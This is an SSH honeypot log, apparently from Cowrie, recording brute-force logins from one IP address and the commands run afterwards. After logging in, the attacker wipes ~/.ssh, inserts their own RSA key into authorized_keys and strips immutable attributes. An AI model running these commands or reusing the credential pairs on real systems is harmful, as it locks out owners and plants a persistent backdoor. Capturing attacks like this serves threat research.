{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:55:21.751351Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:55:22.260527Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:55:22.261305Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:55:22.507731Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:55:22.508747Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47686,"dst_ip":"1.2.3.4","dst_port":22,"session":"5383dc804809","protocol":"ssh","message":"New connection: 212.227.235.229:47686 (1.2.3.4:22) [session: 5383dc804809]","sensor":"my-vps","timestamp":"2025-08-26T12:55:22.745812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:55:22.746794Z","src_ip":"212.227.235.229","session":"5383dc804809"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:55:22.987988Z","src_ip":"212.227.235.229","session":"5383dc804809"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:55:23.994535Z","src_ip":"212.227.235.229","session":"5383dc804809"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:55:25.237821Z","src_ip":"212.227.235.229","session":"5383dc804809"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49850,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fa282a1e101","protocol":"ssh","message":"New connection: 212.227.235.229:49850 (1.2.3.4:22) [session: 3fa282a1e101]","sensor":"my-vps","timestamp":"2025-08-26T12:55:25.489340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:55:25.490079Z","src_ip":"212.227.235.229","session":"3fa282a1e101"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:55:25.737873Z","src_ip":"212.227.235.229","session":"3fa282a1e101"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:55:26.768291Z","src_ip":"212.227.235.229","session":"3fa282a1e101"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:55:27.014407Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:55:27.017805Z","src_ip":"212.227.235.229","session":"3fa282a1e101"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37590,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6dcc967581a","protocol":"ssh","message":"New connection: 212.227.235.229:37590 (1.2.3.4:22) [session: f6dcc967581a]","sensor":"my-vps","timestamp":"2025-08-26T12:55:57.967748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:55:57.969007Z","src_ip":"212.227.235.229","session":"f6dcc967581a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T12:55:58.177931Z","src_ip":"212.227.235.229","session":"f6dcc967581a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60750,"dst_ip":"1.2.3.4","dst_port":22,"session":"aca02fc4ed56","protocol":"ssh","message":"New connection: 217.72.205.35:60750 (1.2.3.4:22) [session: aca02fc4ed56]","sensor":"my-vps","timestamp":"2025-08-26T12:56:00.708819Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:56:00.709944Z","src_ip":"217.72.205.35","session":"aca02fc4ed56"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37502,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d96e88fac72","protocol":"ssh","message":"New connection: 212.227.235.229:37502 (1.2.3.4:22) [session: 3d96e88fac72]","sensor":"my-vps","timestamp":"2025-08-26T12:56:01.139712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:56:01.141219Z","src_ip":"212.227.235.229","session":"3d96e88fac72"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:56:01.389827Z","src_ip":"212.227.235.229","session":"3d96e88fac72"}
{"eventid":"cowrie.login.failed","username":"rajesh","password":"rajesh","message":"login attempt [rajesh/rajesh] failed","sensor":"my-vps","timestamp":"2025-08-26T12:56:02.422373Z","src_ip":"212.227.235.229","session":"3d96e88fac72"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:56:03.671411Z","src_ip":"212.227.235.229","session":"3d96e88fac72"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:56:05.968343Z","src_ip":"212.227.235.229","session":"f6dcc967581a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38500,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bdcaa4986e6","protocol":"ssh","message":"New connection: 212.227.235.229:38500 (1.2.3.4:22) [session: 0bdcaa4986e6]","sensor":"my-vps","timestamp":"2025-08-26T12:56:32.399549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:56:32.400326Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:56:32.648054Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.login.success","username":"root","password":"Root1234@","message":"login attempt [root/Root1234@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:56:33.681318Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:56:34.250627Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:56:34.251623Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:56:34.253007Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:56:34.502754Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:56:35.064633Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:56:35.065487Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:56:35.314888Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:56:35.315732Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41214,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfeaf14f9b74","protocol":"ssh","message":"New connection: 212.227.235.229:41214 (1.2.3.4:22) [session: bfeaf14f9b74]","sensor":"my-vps","timestamp":"2025-08-26T12:56:35.551056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:56:35.552194Z","src_ip":"212.227.235.229","session":"bfeaf14f9b74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:56:35.793632Z","src_ip":"212.227.235.229","session":"bfeaf14f9b74"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:56:36.804185Z","src_ip":"212.227.235.229","session":"bfeaf14f9b74"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:56:38.048057Z","src_ip":"212.227.235.229","session":"bfeaf14f9b74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43054,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6d12bd6f029","protocol":"ssh","message":"New connection: 212.227.235.229:43054 (1.2.3.4:22) [session: e6d12bd6f029]","sensor":"my-vps","timestamp":"2025-08-26T12:56:38.294951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:56:38.295601Z","src_ip":"212.227.235.229","session":"e6d12bd6f029"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:56:38.539958Z","src_ip":"212.227.235.229","session":"e6d12bd6f029"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:56:39.558701Z","src_ip":"212.227.235.229","session":"e6d12bd6f029"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:56:39.804705Z","src_ip":"212.227.235.229","session":"e6d12bd6f029"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:56:39.805624Z","src_ip":"212.227.235.229","session":"0bdcaa4986e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42932,"dst_ip":"1.2.3.4","dst_port":22,"session":"895c13e5d2f6","protocol":"ssh","message":"New connection: 212.227.235.229:42932 (1.2.3.4:22) [session: 895c13e5d2f6]","sensor":"my-vps","timestamp":"2025-08-26T12:57:19.621081Z"}
